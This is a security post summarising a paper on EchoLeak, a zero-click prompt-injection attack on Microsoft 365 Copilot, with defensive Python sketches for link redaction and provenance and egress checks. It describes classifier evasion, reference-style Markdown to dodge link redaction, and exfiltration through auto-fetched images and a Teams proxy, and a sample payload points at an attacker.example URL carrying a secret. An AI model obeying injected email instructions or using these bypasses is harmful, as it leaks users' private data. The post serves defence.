arXiv — EchoLeak: zero-click prompt injection in Microsoft 365 Copilot
Category: Security
AI relevance: this is a concrete, real-world chain that turns untrusted inbound content (an email) into privileged tool/data access (Copilot context) and then into exfiltration (network fetch/proxy), without a user click.
- Paper: EchoLeak: The First Real-World Zero-Click Prompt Injection Exploit in a Production LLM System (arXiv:2509.10540).
- Vuln identifier: the paper frames EchoLeak as CVE-2025-32711 in Microsoft 365 Copilot.
- Zero-click angle: the attacker’s only input is a single crafted email; per the paper, the victim never has to click a link or ask Copilot to run a tool.
- The core failure mode: once the model ingests attacker-controlled content, it can be coerced into treating that content as instructions and crossing a trust boundary into tenant/private context.
- It’s not “just a prompt”: the chain relies on product behaviors around classification, Markdown rendering, and auto-fetching external resources.
- Defense bypasses (as described): evading an XPIA classifier, using reference-style Markdown to dodge link redaction, and triggering auto-fetched images.
- Exfil path (as described): abusing a Microsoft Teams proxy allowed by CSP to transmit data out.
- Lesson: LLM “safety filters” are not a security boundary; you need architectural boundaries + least privilege around data and tools.
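To make the reference-style Markdown bypass concrete, here is a minimal sketch of why a redactor that only matches inline links can miss reference-style ones. The function names (`redact_inline_only`, `redact_all`), the regexes, and the sample payload are illustrative assumptions, not Microsoft's actual filter; a production sanitizer should work from a real Markdown parser's output rather than regexes.

```python
import re

# Inline links/images: [text](url) or ![alt](url)
INLINE = re.compile(r"!?\[([^\]]*)\]\(\s*[^)]*\)")
# Reference uses: [text][label] or ![alt][label]
REF_USE = re.compile(r"!?\[([^\]]*)\]\[[^\]]*\]")
# Reference definitions on their own line: [label]: url
REF_DEF = re.compile(r"^[ ]{0,3}\[([^\]]+)\]:\s*\S+.*$", re.MULTILINE)


def redact_inline_only(md: str) -> str:
    """Hypothetical naive filter: keeps link text, drops inline URLs only."""
    return INLINE.sub(lambda m: m.group(1), md)


def redact_all(md: str) -> str:
    """Also drops reference-style uses and their URL definitions."""
    md = INLINE.sub(lambda m: m.group(1), md)
    md = REF_USE.sub(lambda m: m.group(1), md)
    return REF_DEF.sub("", md)


# Hypothetical payload: an image whose URL lives in a reference definition.
sample = "See ![logo][r1] for details.\n\n[r1]: https://attacker.example/p?d=SECRET\n"

# The inline-only filter leaves the attacker URL in place.
print("attacker.example" in redact_inline_only(sample))
# The broader filter removes it.
print("attacker.example" in redact_all(sample))
```

This sketch does not handle shortcut references (a bare `[label]`) or other Markdown edge cases, which is one more reason to treat output filtering as defense in depth rather than the boundary itself.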
Why it matters
- Copilots collapse trust zones: an agent that can read email and reach internal docs is effectively a cross-domain bridge; prompt injection is how attackers drive across it.
- Zero-click changes the threat model: if ingestion alone is enough, then phishing becomes “send one message” rather than “get a click.”
- AI ops is web ops: renderers, link rewriting, image fetchers, and proxy allowlists become part of your AI attack surface.
- Generalizable pattern: attackers chain “small” behaviors (rendering + fetch + allowlist) into a full exfil workflow, and chaining small steps is exactly what agents are built to do.
What to do
- Map trust boundaries: explicitly document which inputs are untrusted (email, web, tickets) and ensure agent/tool actions cannot cross into sensitive stores without provenance-based checks.
- Kill auto-fetch where you can: treat any automatic external resource fetch (images/URLs) as an exfil primitive; gate, proxy, and log it.
- Constrain egress: restrict outbound network paths from copilots/agent runtimes; prefer explicit allowlists over “general internet.”
- Hard-enforce provenance: propagate “this originated from external email” metadata through the pipeline and use it to deny access to high-sensitivity connectors.
- Red-team your agent chains: test multi-step attacks that mix prompt injection + rendering tricks + tool calls; single-turn jailbreak tests miss the real risk.
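As one way to picture the provenance and egress recommendations above, here is a minimal sketch that tags every context item with its origin, refuses sensitive connector calls when any untrusted item is in context, and checks outbound fetches against a host allowlist. All names here (`Origin`, `ContextItem`, `SENSITIVE_CONNECTORS`, `EGRESS_ALLOWLIST`, the connector and host names) are hypothetical; real copilots expose different hooks, and this is not how any specific product implements it.

```python
from dataclasses import dataclass
from enum import Enum
from typing import Iterable
from urllib.parse import urlsplit


class Origin(Enum):
    INTERNAL = "internal"
    EXTERNAL_EMAIL = "external_email"
    WEB = "web"


# Assumption: these origins are treated as attacker-controllable.
UNTRUSTED = {Origin.EXTERNAL_EMAIL, Origin.WEB}
# Hypothetical connector names and egress hosts, for illustration only.
SENSITIVE_CONNECTORS = {"sharepoint", "mailbox", "hr_docs"}
EGRESS_ALLOWLIST = {"api.internal.example"}


@dataclass(frozen=True)
class ContextItem:
    text: str
    origin: Origin  # provenance travels with the content


def context_is_tainted(items: Iterable[ContextItem]) -> bool:
    """True if any item in the model's context came from an untrusted source."""
    return any(item.origin in UNTRUSTED for item in items)


def may_call_connector(connector: str, items: Iterable[ContextItem]) -> bool:
    """Deny sensitive connectors whenever untrusted content is in context."""
    return not (connector in SENSITIVE_CONNECTORS and context_is_tainted(items))


def may_fetch(url: str) -> bool:
    """Allow only HTTPS requests to explicitly allowlisted hosts."""
    parts = urlsplit(url)
    return parts.scheme == "https" and parts.hostname in EGRESS_ALLOWLIST


ctx = [ContextItem("quarterly notes", Origin.INTERNAL),
       ContextItem("crafted email body", Origin.EXTERNAL_EMAIL)]
print(may_call_connector("sharepoint", ctx))          # tainted context
print(may_fetch("https://attacker.example/x?d=1"))    # host not allowlisted
```

A host allowlist alone is not sufficient: as the exfil path described above shows, an allowlisted domain that proxies or redirects requests can still carry data out, so allowlisted endpoints need their own review and logging.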